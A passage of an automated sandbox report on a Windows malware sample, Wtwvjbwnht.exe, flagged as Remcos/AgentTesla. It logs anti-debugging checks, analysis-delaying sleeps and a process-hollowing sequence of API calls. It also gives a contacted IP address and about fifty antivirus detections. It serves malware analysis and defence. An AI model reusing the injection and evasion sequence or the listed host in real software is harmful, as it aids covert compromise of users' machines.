GetAdaptersAddresses Sept. 30, 2023, 1:04 p.m.	flags: 1158 family: 0	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 30, 2023, 1:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 30, 2023, 1:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (2 events)

url	https://www.nuget.org/packages/Newtonsoft.Json.Bson
url	https://www.newtonsoft.com/jsonschema

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 30, 2023, 1:04 p.m.	status_code: 0xffffffff process_identifier: 2732 process_handle: 0x00000484		0	0
NtTerminateProcess Sept. 30, 2023, 1:04 p.m.	status_code: 0xffffffff process_identifier: 2732 process_handle: 0x00000484	1	0	0

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 0d03568b97427b51afdc839030e54668ccb44a86

Communicates with host for which no DNS query was performed (1 event)

host

192.3.179.157

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2732 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000478		3221225496	0
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2768 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000480	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Sept. 30, 2023, 1:04 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

Wtwvjbwnht.exe tried to sleep 2728163 seconds, actually delayed analysis time by 2728163 seconds

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 manipulating memory of non-child process 2732
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2732 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000478		3221225496	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 30, 2023, 1:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $±lÁõ}õ}õ}Ò»Íö}Ò»Ïô}Ò»Îô}Richõ}PEL á>àÖàð@ð@.textÕÖ ` base_address: 0x00400000 process_identifier: 2768 process_handle: 0x00000480	1	1	0
WriteProcessMemory Sept. 30, 2023, 1:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2768 process_handle: 0x00000480	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 30, 2023, 1:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $±lÁõ}õ}õ}Ò»Íö}Ò»Ïô}Ò»Îô}Richõ}PEL á>àÖàð@ð@.textÕÖ ` base_address: 0x00400000 process_identifier: 2768 process_handle: 0x00000480	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 called NtSetContextThread to modify thread in remote process 2768
NtSetContextThread Sept. 30, 2023, 1:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199136 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000484 process_identifier: 2768	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 resumed a thread in remote process 2768
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x00000484 suspend_count: 1 process_identifier: 2768	1	0	0

Executed a process and injected code into it, probably while unpacking (20 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x00000370 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x00000384 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x000003a4 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x000003e4 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x000003f8 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x0000041c suspend_count: 1 process_identifier: 2552	1	0
CreateProcessInternalW Sept. 30, 2023, 1:04 p.m.	thread_identifier: 2736 thread_handle: 0x0000047c process_identifier: 2732 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\Wtwvjbwnht.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000478	1	1
NtGetContextThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x0000047c	1	0
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2732 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000478		3221225496
CreateProcessInternalW Sept. 30, 2023, 1:04 p.m.	thread_identifier: 2772 thread_handle: 0x00000484 process_identifier: 2768 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\Wtwvjbwnht.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000480	1	1
NtGetContextThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x00000484	1	0
NtAllocateVirtualMemory Sept. 30, 2023, 1:04 p.m.	process_identifier: 2768 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000480	1	0
WriteProcessMemory Sept. 30, 2023, 1:04 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $±lÁõ}õ}õ}Ò»Íö}Ò»Ïô}Ò»Îô}Richõ}PEL á>àÖàð@ð@.textÕÖ ` base_address: 0x00400000 process_identifier: 2768 process_handle: 0x00000480	1	1
WriteProcessMemory Sept. 30, 2023, 1:04 p.m.	buffer: base_address: 0x00401000 process_identifier: 2768 process_handle: 0x00000480	1	1
WriteProcessMemory Sept. 30, 2023, 1:04 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2768 process_handle: 0x00000480	1	1
NtSetContextThread Sept. 30, 2023, 1:04 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199136 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000484 process_identifier: 2768	1	0
NtResumeThread Sept. 30, 2023, 1:04 p.m.	thread_handle: 0x00000484 suspend_count: 1 process_identifier: 2768	1	0

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.Common.90A76D20
Lionic	Trojan.Win32.Remcos.4!c
MicroWorld-eScan	Gen:Trojan.Mardom.MN.10
CAT-QuickHeal	Backdoor.MSIL
McAfee	Artemis!EA462E6077AA
Cylance	unsafe
VIPRE	Gen:Trojan.Mardom.MN.10
Sangfor	Backdoor.Msil.Remcos.Vi75
K7AntiVirus	Trojan-Downloader ( 005ab66f1 )
Alibaba	Backdoor:MSIL/AgentTesla.e36ad069
K7GW	Trojan-Downloader ( 005ab66f1 )
Arcabit	Trojan.Mardom.MN.10
VirIT	Trojan.Win32.MSIL_Heur.A
Cyren	W32/MSIL_Kryptik.JWR.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/TrojanDownloader.Agent.PRI
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	HEUR:Backdoor.MSIL.Remcos.gen
BitDefender	Gen:Trojan.Mardom.MN.10
Avast	Win32:BackdoorX-gen [Trj]
Tencent	Malware.Win32.Gencirc.13f04cb5
Sophos	Mal/Generic-S
F-Secure	Trojan.TR/Dldr.Agent.xvgya
Zillya	Backdoor.Remcos.Win32.6745
TrendMicro	TROJ_GEN.R002C0WIM23
McAfee-GW-Edition	Artemis!Trojan
FireEye	Gen:Trojan.Mardom.MN.10
Emsisoft	Gen:Trojan.Mardom.MN.10 (B)
Ikarus	Trojan-Downloader.MSIL.Agent
Webroot	W32.Trojan.Gen
Avira	TR/Dldr.Agent.xvgya
Antiy-AVL	Trojan[Backdoor]/MSIL.Remcos
Gridinsoft	Trojan.Win32.Agent.sa
Microsoft	Trojan:MSIL/AgentTesla.PSYF!MTB
ZoneAlarm	HEUR:Backdoor.MSIL.Remcos.gen
GData	Gen:Trojan.Mardom.MN.10
Google	Detected
AhnLab-V3	Trojan/Win.SnakeKeylogger.C5492476
ALYac	Gen:Trojan.Mardom.MN.10
MAX	malware (ai score=85)
Malwarebytes	Crypt.Trojan.MSIL.DDS
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002C0WIM23
Rising	Backdoor.Remcos!8.B89E (CLOUD)
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.PRI!tr.dldr
AVG	Win32:BackdoorX-gen [Trj]

Wtwvjbwnht.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All